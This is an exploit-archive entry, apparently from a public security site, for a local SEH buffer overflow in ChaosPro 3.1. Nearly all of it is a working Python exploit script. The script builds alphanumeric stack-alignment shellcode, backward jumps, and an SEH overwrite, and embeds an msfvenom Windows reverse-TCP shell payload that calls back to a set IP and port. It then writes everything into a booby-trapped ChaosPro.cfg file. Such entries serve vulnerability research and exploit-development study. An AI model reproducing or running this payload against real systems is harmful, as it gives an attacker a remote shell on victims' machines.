ChaosPro 3.1 SEH Buffer Overflow

2019.09.05
Credit: securitychops
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!C:\Python27\python.exe # Title : ChaosPro 3.1 # Twitter : @securitychops # Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html # our egg! payload = "T00WT00W" # adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" #the payload payload += ( # msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 # LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00' "\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30" "\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32" "\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b" "\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30" "\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c" "\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39" "\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30" "\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b" "\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50" "\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30" "\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f" "\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d" "\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d" "\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35" "\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38" "\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38" "\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51" "\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51" "\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43" "\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31" "\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f" "\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59" "\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50" "\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36" "\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50" "\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53" "\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c" "\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a" "\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50" "\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35" "\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38" "\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46" "\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36" "\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53" "\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50" "\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36" "\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59" "\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50" "\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47" "\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59" "\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f" "\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b" "\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f" "\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41" ) #badchars #\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a #\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9 #\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8 #\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7 #\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6 #\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5 #\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4 #\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff # stack alignment pop_esp = "\x5c" pop_eax = "\x58" push_eax = "\x50" push_esp = "\x54" align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01" zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01" #this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 = "\x40\x75\x06\x75" #line containing our payload line_start = "Username " line_start += payload + "\n" #line with our overflow line_start += "ProjectPath " junk = line_start #the buffer starts being overwritten with # our controlled values at 522 junk += "A" * 522 #junk += alpha_numeric_hex junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06)) #- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4) # baby nopsled junk += "A" * 9 # ok, lets start working stuff here ... we have 126 bytesish ... junk += zero_eax junk += push_esp + pop_eax # push esp, pop eax junk += align_stack junk += push_eax junk += pop_esp # first section into the stack # e7 ff e4 75 # good junk += zero_eax junk += "\x2d\x89\x88\x87\x86" junk += "\x2d\x01\x8f\x77\x8f" junk += "\x2d\x01\x04\x01\x02" junk += push_eax # second section into the stack # af e7 75 af # good junk += zero_eax junk += "\x2d\x4f\x4e\x4d\x4c" junk += "\x2d\x01\x39\x8f\x02" junk += "\x2d\x01\x03\x3c\x01" junk += push_eax # third section into the stack # d7 89 57 30 # good junk += zero_eax junk += "\x2d\x8f\x8e\x74\x73" junk += "\x2d\x3e\x19\x01\x8f" junk += "\x2d\x03\x01\x01\x26" junk += push_eax # size for section one junk += "A" * ( 126 - 9 # nopsled # aligning the stack - len(zero_eax) - len(push_esp) - len(pop_eax) - len(align_stack) - len(push_eax) - len(pop_esp) # first set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # second set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # third set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) ) # baby nopslep just for breathing room junk += "AAAA" # First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 #Section Two # baby nopsled junk += "AAA" # fourth section into the stack part two # 30 54 b8 ec # fourth section into the stack part one junk += zero_eax junk += "\x2d\x80\x15\x75\x75" junk += "\x2d\x80\x20\x32\x35" junk += "\x2d\x14\x11\x04\x25" junk += push_eax # fifth section into the stack # 74 5a 05 3c # good junk += zero_eax junk += "\x2d\x8f\x8e\x8d\x89" junk += "\x2d\x34\x6b\x17\x01" junk += "\x2d\x01\x01\x01\x01" junk += push_eax # sixth section into the stack # 2e cd 58 53 # good junk += zero_eax junk += "\x2d\x8f\x8e\x8d\x8c" junk += "\x2d\x1d\x18\x8e\x43" junk += "\x2d\x01\x01\x17\x01" junk += push_eax # seventh section into the stack # 43 43 db 31 # good junk += zero_eax junk += "\x2d\x8f\x8e\x8d\x8c" junk += "\x2d\x3e\x7f\x2d\x2d" junk += "\x2d\x02\x17\x01\x03" junk += push_eax junk += "A" * ( 126 # amount of room before we need to jump - 3 # baby nopsled # part one of fourth set of bytes going onto the stack - len(zero_eax) # part two of fourth sec of bytes going onto the stack - 15 - len(push_eax) # fifth set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # sixth set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) # seventh set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) - 4 # baby nopsled - len(jmpback80) ) # Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 # baby nopsled junk += "AAAA" # eighth section into the stack part two # 52 42 0f ff # good # eighth section into the stack part one junk += zero_eax junk += "\x2d\x65\x65\x75\x75" junk += "\x2d\x65\x65\x25\x25" junk += "\x2d\x37\x25\x23\x13" junk += push_eax # ninth section into the stack # ca 81 66 43 # good junk += zero_eax junk += "\x2d\x8f\x81\x7c\x7b" junk += "\x2d\x2d\x17\x01\x8f" junk += "\x2d\x01\x01\x01\x2b" junk += push_eax junk += "A" * ( 126 # amount of room before we need to jump - len(jmpback80) - 4 # baby nopsled # eighth set of bytes going onto the stack # eighth section - len(zero_eax) - 15 - len(push_eax) # ninth set of bytes going onto the stack - len(zero_eax) - 15 - len(push_eax) - len(jmpforward06) ) # First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127) junk += jmpforward06 junk += jmpback80 #seh address for pop, pop and ret with a 0x00 at the end ... junk += "\x5d\x10\x40" # write the evil file with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file: the_file.write(junk)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top